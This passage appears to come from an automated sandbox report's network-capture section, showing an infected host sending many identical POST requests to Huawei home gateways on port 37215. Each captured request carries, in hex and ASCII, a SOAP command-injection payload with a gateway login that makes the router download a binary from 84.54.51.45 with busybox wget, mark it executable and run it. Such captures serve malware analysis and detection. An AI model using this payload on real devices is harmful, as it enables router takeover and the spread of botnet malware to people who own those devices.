                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1545192.168.2.156065841.202.132.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108273029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1546192.168.2.154731241.137.161.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108300924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1547192.168.2.155315041.9.205.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108320951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1548192.168.2.155062641.236.147.22837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108355999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1549192.168.2.155943841.254.89.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108355999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1550192.168.2.153435841.162.81.13037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108362913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1551192.168.2.153437841.215.202.7537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108364105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1552192.168.2.155829641.201.129.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108374119 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1553192.168.2.154009641.198.183.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108406067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1554192.168.2.154170641.54.94.21737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108413935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
